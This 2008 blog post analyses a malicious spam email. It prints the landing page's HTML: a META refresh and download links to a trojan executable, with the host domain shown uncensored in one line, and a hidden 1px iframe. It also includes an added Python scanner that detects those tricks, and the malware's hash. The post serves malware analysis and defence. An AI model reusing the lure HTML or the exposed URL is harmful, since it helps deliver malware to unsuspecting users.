Malicious Spam in Action

August 11, 2008

Hi,

Spam is usually aimed at mass marketing and does not contain any form of malicious code, but in the last period a second, heavily emerging collateral trend (especially in web applications that allow comments, such as blogs) is malicious spam: an apparently ordinary spam mail that redirects you to malicious code.

Here is the latest malicious spam mail that I've received on my gmail account:

Subject: mp3 Shocking for evilcry

Content: Rihanna New video!!!
Look It now

The malicious link points to http://ro{CENSORED}eel.com/index1.php

By dissecting the malicious link we can see that a redirection is done:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<META HTTP-EQUIV="refresh" CONTENT="5;URL=http://robbiereel.com/video3425gdf3.exe">
<title></title>
</head>

<body style="background:#ffffff;">
<iframe src="http://ro{CENSORED}l.com/pindex.php" style="width:1px; height:1px;"></iframe><br>

<div style="text-align:center; padding-top:50px;">
<a href="http://ro{CENSORED}l.com/video3425gdf3.exe" style="font-weight:bold;"><img src="wait.gif" style="border:0px;"></a><br>
<br>
<a href="http://r{CENSORED}l.com/video3425gdf3.exe" style="font-weight:bold; color:#364980; font-size:17px;">Download Video</a>

</div>
</body>
</html>

The technique is always the same: a fake Video.exe that the victim downloads and executes. In this case the malware is named video3425gdf3.exe.
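As an added example (not part of the original post), a small Python scanner that flags the three tricks visible in the dissected landing page: a META refresh whose target is an executable, a 1px hidden iframe, and download links pointing at .exe files. The HTML it scans is a constructed stand-in modelled on the page, with the domain replaced by the placeholder malicious.example.

```python
# Added example, not from the original post: detect the redirection tricks
# used by the spam landing page (META refresh to an .exe, 1px iframe, links
# to executables). The sample HTML is constructed; the domain is a placeholder.
import re
from html.parser import HTMLParser

# Extensions that indicate a direct download of a Windows executable
EXE_RE = re.compile(r"\.(exe|scr|pif|com|bat)(\?|$)", re.IGNORECASE)


class RedirectFinder(HTMLParser):
    """Collects (indicator, target) pairs from meta/iframe/a tags."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            # CONTENT looks like "5;URL=http://..."; pull out the URL part
            m = re.search(r"url\s*=\s*(\S+)", a.get("content", ""), re.I)
            if m and EXE_RE.search(m.group(1)):
                self.findings.append(("meta-refresh-to-exe", m.group(1)))
        elif tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            if any(s in style for s in ("width:1px", "height:1px", "display:none")):
                self.findings.append(("hidden-iframe", a.get("src", "")))
        elif tag == "a" and EXE_RE.search(a.get("href", "")):
            self.findings.append(("link-to-exe", a["href"]))


def scan_html(html):
    """Return the list of indicators found in an HTML document."""
    parser = RedirectFinder()
    parser.feed(html)
    return parser.findings


# Constructed sample modelled on the page; domain is a placeholder
SAMPLE = """<html><head>
<META HTTP-EQUIV="refresh" CONTENT="5;URL=http://malicious.example/video3425gdf3.exe">
</head><body>
<iframe src="http://malicious.example/pindex.php" style="width:1px; height:1px;"></iframe>
<a href="http://malicious.example/video3425gdf3.exe">Download Video</a>
</body></html>"""

if __name__ == "__main__":
    for kind, target in scan_html(SAMPLE):
        print(kind, target)
```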

Let's analyse video3425gdf3.exe

File: video3425gdf3.exe

MD5: acd73c4930e8191fa7a35dac448d7f4b

Kaspersky Anti-Virus: Found Trojan-Downloader.Win32.Agent.aacg